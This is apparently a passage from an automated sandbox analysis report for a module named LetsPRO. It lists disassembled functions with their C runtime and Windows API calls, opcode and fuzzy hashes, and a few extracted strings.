                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __p__iob_errno_write$__lseeki64_fileno_isatty
                                        • String ID:
                                        • API String ID: 2198290031-0
                                        • Opcode ID: 7fb15f86da1094cc84401895b31e854b696ef766f7ff19f8545597add20939a6
                                        • Instruction ID: 6d034b8d10cd6fed63b50ba4174a8f11124c8fcff8e5353fbb80ada6c6cb5e0f
                                        • Opcode Fuzzy Hash: 7fb15f86da1094cc84401895b31e854b696ef766f7ff19f8545597add20939a6
                                        • Instruction Fuzzy Hash: E2410676504B059FD7248F29C841A9A7BE4EF62338B24C61EE4F697E90DB38E900CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_V@YAXPAX@Z.MSVCR100(?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D893
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D89B
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D8A3
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D8BA
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C93D8DD
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6C93D8F7
                                        • _memset.LIBCMT(?,00000000,?,6C93DA5B,?,?,?,?,?,6C93D023,?,00000000), ref: 6C93D90D
                                        • _memset.LIBCMT(?,00000000,?,00000000), ref: 6C93D926
                                        • _memset.LIBCMT(?,00000000,?,?,00000000,?,00000000), ref: 6C93D937
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID:
                                        • API String ID: 2102423945-0
                                        • Opcode ID: 85aee5d3f42f1a87ef047c3eda421d7cabb3c702151de093e9d7a7882a32195b
                                        • Instruction ID: 312309b61d270f83f4bfaaef5782bff02d1088fa06611dd73c7634ed8a8d20f4
                                        • Opcode Fuzzy Hash: 85aee5d3f42f1a87ef047c3eda421d7cabb3c702151de093e9d7a7882a32195b
                                        • Instruction Fuzzy Hash: 67214FB12117116FEB349B38DD16B67B7E4EF14344F50892DE19BC9AA1EB75F8048B40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C90AD94
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FD8C
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FD94
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDAA
                                        • _invalid_parameter_noinfo.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDB5
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDBC
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDC4
                                        • _errno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDD1
                                        • __doserrno.MSVCR100(6C90AD70,00000010,6C90CE19,00000000,?,?,?,?,6C9130F1,?), ref: 6C92FDDC
                                          • Part of subcall function 6C90A51F: EnterCriticalSection.KERNEL32(00000108,6C90A580,0000000C,6C90ECA7,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C90A570
                                          • Part of subcall function 6C90ABB7: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6C90AC7D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 590220429-0
                                        • Opcode ID: 98f1ee1cfc2bbfc09064ff2716052f0419d1b42007a1e4399155484676464d2f
                                        • Instruction ID: 484800faf9b46a39611878dc89077e5abbddc907fd9df7581aefe345240e9bdf
                                        • Opcode Fuzzy Hash: 98f1ee1cfc2bbfc09064ff2716052f0419d1b42007a1e4399155484676464d2f
                                        • Instruction Fuzzy Hash: 90217F72A51644DFD7119FA4C88079D37B4AF2232AF210648D4749BAE1CF79C9048BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedFlushSList.KERNEL32(?,?,?,6C93F2EA), ref: 6C93F9E3
                                        • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6C93F2EA), ref: 6C93F9EF
                                        • InterlockedFlushSList.KERNEL32(?,?,?,6C93F2EA), ref: 6C93F9FD
                                        • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6C93F2EA), ref: 6C93FA09
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA1E
                                        • ??3@YAXPAX@Z.MSVCR100(00000000,?,?,6C93F2EA), ref: 6C93FA3B
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA4C
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,6C93F2EA), ref: 6C93FA52
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6C93F2EA), ref: 6C93FA62
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@$FlushInterlockedList
                                        • String ID:
                                        • API String ID: 681866488-0
                                        • Opcode ID: 6bd8d437a87f53a7a3be0088dd0577fb47f183594620b1543589d30ef21c6ec1
                                        • Instruction ID: d1bc5298fa827c008e5124b9f56c6d8bc2446af3a1fc32168feb94fe5ba2c942
                                        • Opcode Fuzzy Hash: 6bd8d437a87f53a7a3be0088dd0577fb47f183594620b1543589d30ef21c6ec1
                                        • Instruction Fuzzy Hash: E011A0762046529B8311CE69D5C084AB3B9FFEA32C339256ED49983F01FB30F959CA50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc_crt.MSVCR100(00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C90A9AF
                                        • _lock.MSVCR100(0000000A,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C90A9C1
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C90A9D8
                                        • __FF_MSGBANNER.LIBCMT ref: 6C9274DF
                                        • __NMSG_WRITE.LIBCMT ref: 6C9274E6
                                        • _errno.MSVCR100(6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C9274F9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                        • String ID:
                                        • API String ID: 957642387-0
                                        • Opcode ID: 284ff8535619eb2edaa7bf742ef78138fa4e486557a85d89f09139859836ec1d
                                        • Instruction ID: baf52fde7aab6700f6d2f239d17e90d3412e27089458b1954fae17341f23e4fd
                                        • Opcode Fuzzy Hash: 284ff8535619eb2edaa7bf742ef78138fa4e486557a85d89f09139859836ec1d
                                        • Instruction Fuzzy Hash: D7110A31744642DEEB006FB5D881BAC77B06FB271CF21445DD1A16BA80CF78C489CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2636503730-0
                                        • Opcode ID: 543de16471b8c2c94b093de074acdbf3e254033c123be93140c8024047ee276c
                                        • Instruction ID: 9709cac2beba2fd28ad7aa175df735281652f5daf180c3cfab46ac5eb5695a04
                                        • Opcode Fuzzy Hash: 543de16471b8c2c94b093de074acdbf3e254033c123be93140c8024047ee276c
                                        • Instruction Fuzzy Hash: 0B01D170604A54DFD7215FB9C9097CE3B28AF2272CF105258E9349AEA4DF39C4058BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9460EC
                                        • __ExceptionPtrCopy.LIBCMT(?,00000008,00000014,6C94580F,?,?,?), ref: 6C946103
                                          • Part of subcall function 6C94BAEB: __EH_prolog3.LIBCMT ref: 6C94BAF2
                                          • Part of subcall function 6C94BAEB: _Reset.LIBCMT ref: 6C94BB11
                                        • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6C94580F,?,?,?), ref: 6C94610D
                                          • Part of subcall function 6C94BA7A: shared_ptr.LIBCMT ref: 6C94BA84
                                        • ??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6C94580F,?,?,?), ref: 6C946113
                                        • __uncaught_exception.MSVCR100 ref: 6C94611F
                                        • __ExceptionPtrCopy.LIBCMT(?,?), ref: 6C946130
                                        • ?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6C94613D
                                        • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6C94614A
                                        • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6C94615A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Exception$Destroy@@$CopyH_prolog3$??3@ResetRethrow@@__uncaught_exceptionshared_ptr
                                        • String ID:
                                        • API String ID: 1394407404-0
                                        • Opcode ID: 6fc3f9d86c4567664eabd3457247aef95c76b623301000cf692cb2d5f0d7f2b6
                                        • Instruction ID: 013a7088a2504405e6be7db3475ca645386f3e78a59c9b57b8ad05bf42d75d1c
                                        • Opcode Fuzzy Hash: 6fc3f9d86c4567664eabd3457247aef95c76b623301000cf692cb2d5f0d7f2b6
                                        • Instruction Fuzzy Hash: EC017CB2801A18EADF00E7F48805BDEBBBC6F39218F548154D510A3A81D734D70987B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: @$g
                                        • API String ID: 1302938615-2917482895
                                        • Opcode ID: 11d1b95197930e505d92971d561ea7b5b995b051d023459917af4af464eacd67
                                        • Instruction ID: 41bcaf99d858ad7472ebfcddfea93f2acf6530ddaa4d9f5867771aa93b8a8ff1
                                        • Opcode Fuzzy Hash: 11d1b95197930e505d92971d561ea7b5b995b051d023459917af4af464eacd67
                                        • Instruction Fuzzy Hash: AAC1B072E4926D8EDB208A14CC887D9B7B8AB5531CF2402DDD418A7A91D774DFC5CF88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: generic-type-$template-parameter-
                                        • API String ID: 0-13229604
                                        • Opcode ID: 48a65bd2c9d631bb8269a90a12d5e83b22d3e61abbdf6a176e916fcee3c04589
                                        • Instruction ID: 4ec34462ec694154fbda7e4a982dfc0cefe1b40b0cf40ef6e651dca51b76c146
                                        • Opcode Fuzzy Hash: 48a65bd2c9d631bb8269a90a12d5e83b22d3e61abbdf6a176e916fcee3c04589
                                        • Instruction Fuzzy Hash: 23617F72B096489FDB04CFA8D491AED7BB8EF5A304F20405ED561A7B40D735D909CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C90072C: GetLastError.KERNEL32(6C8F3238,?,6C90084A,6C998136), ref: 6C900730
                                          • Part of subcall function 6C90072C: __set_flsgetvalue.MSVCR100 ref: 6C90073E
                                          • Part of subcall function 6C90072C: SetLastError.KERNEL32(00000000), ref: 6C900750
                                        • _calloc_crt.MSVCR100(00000086,00000002), ref: 6C97E495
                                        • __get_sys_err_msg.LIBCMT ref: 6C97E4B8
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C371
                                          • Part of subcall function 6C97C364: __sys_nerr.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C37A
                                          • Part of subcall function 6C97C364: __sys_errlist.MSVCR100(?,?,6C97C41C,00000000), ref: 6C97C381
                                        • __cftoe.LIBCMT(00000000,?,00000086,00000000,00000085), ref: 6C97E4C2
                                          • Part of subcall function 6C95C4E8: _mbstowcs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6C95C4FE
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97E4D7
                                        • _errno.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E56D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E577
                                        Strings
                                        Similarity
                                        • API ID: ErrorLast__sys_nerr$__cftoe__get_sys_err_msg__invoke_watson__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_mbstowcs_s_l
                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                        • API String ID: 3324003163-798102604
                                        • Opcode ID: 6e11a9f0eb7d73ce9b5184017b58946069b8c9c71110d89f7d95dbfd87e8de23
                                        • Instruction ID: bc02643497e259ac53cec4d946934d39e2edbc2ddd3390df36d4562e1d053379
                                        • Opcode Fuzzy Hash: 6e11a9f0eb7d73ce9b5184017b58946069b8c9c71110d89f7d95dbfd87e8de23
                                        • Instruction Fuzzy Hash: 7331AF9264F3D81FCB229A745C69495BF286A2362870DC7DFE8898FD93E714D40083B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT(00000000,00000000,00000090,00000083,00000001,000000BC,?,6C906D85,?,00000001,00000000,00000000,00000005), ref: 6C9066CE
                                        • strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6C912850
                                        Strings
                                        Similarity
                                        • API ID: _memsetstrncpy_s
                                        • String ID: _.,
                                        • API String ID: 1794348173-2709443920
                                        • Opcode ID: 3af88e6a918f7ae212e4de25495006fcf1ea70196762d564851c7e2fd686ed4e
                                        • Instruction ID: 21535e6babacff5215b1e3e21da342f8d59e328b0f7dc621073725cb2c2eb8b6
                                        • Opcode Fuzzy Hash: 3af88e6a918f7ae212e4de25495006fcf1ea70196762d564851c7e2fd686ed4e
                                        • Instruction Fuzzy Hash: DA31F1716492A9AEEF2089258C00BEA3B7CAF0236CF187A16F96CD6981E335D584C751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID: P
                                        • API String ID: 2819658684-3110715001
                                        • Opcode ID: 6a3a02d3b2b67dd4f2ce6058fc93e99910dda681d2a43c3dbbf5f4b720a12204
                                        • Instruction ID: 725ce01988c2737cf737e1543209d85857beb279fe99d1c7ba076dcf739e71da
                                        • Opcode Fuzzy Hash: 6a3a02d3b2b67dd4f2ce6058fc93e99910dda681d2a43c3dbbf5f4b720a12204
                                        • Instruction Fuzzy Hash: 8331A431A00285DFCB20EF68C8809BE77B8FF18318B61065AE8709BA91D771D961C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C929383
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92938E
                                        • _errno.MSVCR100(?), ref: 6C92939B
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C9293A6
                                        Strings
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: B
                                        • API String ID: 2959964966-1255198513
                                        • Opcode ID: 6974be05800ae278215a632e5f284c7275e9fa6b75bdaf49c7eb701bdbec58ca
                                        • Instruction ID: 328647e63064998a2a8c17655bd0855d9ef41904a395bad5365a69b8b255c3e5
                                        • Opcode Fuzzy Hash: 6974be05800ae278215a632e5f284c7275e9fa6b75bdaf49c7eb701bdbec58ca
                                        • Instruction Fuzzy Hash: 9E318131A0551DDFDF009FA8C8844EEB7B8FF19328F15062EEA60A3AD1D779D5058BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: B
                                        • API String ID: 2959964966-1255198513
                                        • Opcode ID: 1234c5f896610d5cf87850d161ef2958a2b00a23cc67fc54cef159a4d38bea26
                                        • Instruction ID: 66f34affd5007e677105c2c585c4c24866ce9b1bb543608bc72b9bde6eebe561
                                        • Opcode Fuzzy Hash: 1234c5f896610d5cf87850d161ef2958a2b00a23cc67fc54cef159a4d38bea26
                                        • Instruction Fuzzy Hash: D521B572E0111DDFDF108F94CC805EE77B8FB25328F10022AE920A7690EB35C8158BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID: B
                                        • API String ID: 2959964966-1255198513
                                        • Opcode ID: 746934311497ab62f61339c9e4c1a7ac3d8c7773d5ca8268d3ff9410dcc80627
                                        • Instruction ID: e9fa5a9d0693264c611b17e29c19a3a7c641a733fb90afd0f8c8a6f42be1cfa8
                                        • Opcode Fuzzy Hash: 746934311497ab62f61339c9e4c1a7ac3d8c7773d5ca8268d3ff9410dcc80627
                                        • Instruction Fuzzy Hash: B4219772A0011DDFDF005F94CC805EE77B4FF1A328B15051AE520A7AA4D735D4058BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: NameName::
                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                        • API String ID: 1333004437-2211150622
                                        • Opcode ID: 4b45ecc307f1188ffde0b500370456b902843e668ce0b6e11b7be83bff2dc4cc
                                        • Instruction ID: 7a3c0336787d05cc33262b6206f7f8b1a1e28fd35329441b36d667480cb4263e
                                        • Opcode Fuzzy Hash: 4b45ecc307f1188ffde0b500370456b902843e668ce0b6e11b7be83bff2dc4cc
                                        • Instruction Fuzzy Hash: BB2159323196489FCB01CF98D4419AD3BF8EF4A79DB648195E885ABB15DB34D902CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • strncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6C913B01
                                        • _ismbblead.MSVCR100(00000001), ref: 6C913B20
                                        • strncpy_s.MSVCR100(?,?,?,?), ref: 6C913B74
                                        • strncpy_s.MSVCR100(?,?,?,?), ref: 6C913BA9
                                        • _errno.MSVCR100 ref: 6C930FC3
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C930FD2
                                        Similarity
                                        • API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
                                        • String ID:
                                        • API String ID: 519590025-0
                                        • Opcode ID: 85bb507173621e1a4525b74ec89be9cccdc24d122ab0f7e4d4b7746af140b4a2
                                        • Instruction ID: 1a9105e68129d6951bf2eb64c2e79f0e2a5049facffe43715f2f92935c654ee9
                                        • Opcode Fuzzy Hash: 85bb507173621e1a4525b74ec89be9cccdc24d122ab0f7e4d4b7746af140b4a2
                                        • Instruction Fuzzy Hash: 5A71A331949A9CDFCF128E288D416ED3BB9BB45748F34225AE86897D14E332C994CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0c293bb4a7705d562b928e09b8f339382f9a22b2a1c4973c20c709af4f67277
                                        • Instruction ID: c195b84f40961a98c8cb39261eaeb840d2961fe27e08b0bf632085ad5444344c
                                        • Opcode Fuzzy Hash: a0c293bb4a7705d562b928e09b8f339382f9a22b2a1c4973c20c709af4f67277
                                        • Instruction Fuzzy Hash: 2871B372A1114ADFDF10CF94C894DEEBBB9FF05318B14056EE1A1A7958DB35C940CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _ismbblead.MSVCR100(00000001,?,?,?,?,?,6C97DA48,?,?,?,?,?,?,?,?,?), ref: 6C97D8C0
                                        • __cftof.LIBCMT(00000000,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D909
                                        • __cftof.LIBCMT(?,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D945
                                        • __cftof.LIBCMT(?,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D962
                                        • __cftof.LIBCMT(?,000000FF,?,?,?,?,?,?,?,6C97DA48,?,?,?,?,?,?), ref: 6C97D982
                                        • _errno.MSVCR100(?,?,?,?,?,6C97DA48,?,?,?,?,?,?,?,?,?), ref: 6C97D9DB
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6C97DA48,?,?,?,?,?,?,?,?,?), ref: 6C97D9EA
                                        Similarity
                                        • API ID: __cftof$_errno_invalid_parameter_noinfo_ismbblead
                                        • String ID:
                                        • API String ID: 2528209487-0
                                        • Opcode ID: d121932c2241aa280c719d4f602c558b646f9e7d4dc17766c4679811aa389d1a
                                        • Instruction ID: 16fb0ac7553be5c830138e1b10916740b362272e18b413c33a87a7dfafc8736a
                                        • Opcode Fuzzy Hash: d121932c2241aa280c719d4f602c558b646f9e7d4dc17766c4679811aa389d1a
                                        • Instruction Fuzzy Hash: 0D71B533907645DBDF328F29C8403D97BA9EF95758F34029AE8A856B44E371C981CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD3D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD48
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD69
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD74
                                        • __stricmp_l.LIBCMT(00000001,00000000,?,00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FD9E
                                          • Part of subcall function 6C970FC5: _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6C970FE0
                                          • Part of subcall function 6C970FC5: _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6C970FEB
                                        • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6C9A7C68,00000002,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6C95FDF4
                                        • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6C9A7C68,00000002,?,00000001,?,?,?,?,?,?,?), ref: 6C95FE75
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?,00000000,00000001,6C9A7C68), ref: 6C95FED2
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo$String__crt$__stricmp_l_invalid_parameter
                                        • String ID:
                                        • API String ID: 2295373847-0
                                        • Opcode ID: c6bef12b193cd357e67a0a2f2bcd3b1d31eeb466c669d0dc8619482a185a6827
                                        • Instruction ID: 06705d4ae5ca270311a42fae1f220420524933848a363bd1415b93f5e8cb5d8c
                                        • Opcode Fuzzy Hash: c6bef12b193cd357e67a0a2f2bcd3b1d31eeb466c669d0dc8619482a185a6827
                                        • Instruction Fuzzy Hash: F6513B71E042899BDB15CB68C484BED7BF4AF0233CF684299E4B19B9D2C771CA65C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,F3B6147F), ref: 6C94833B
                                        • GetLastError.KERNEL32 ref: 6C948349
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C948362
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C948371
                                        • _memset.LIBCMT(?,00000000,0000000C), ref: 6C9483D7
                                        • SetThreadPriority.KERNEL32(?,?,?), ref: 6C94840B
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C948417
                                        • CloseHandle.KERNEL32(00000000), ref: 6C948428
                                        Similarity
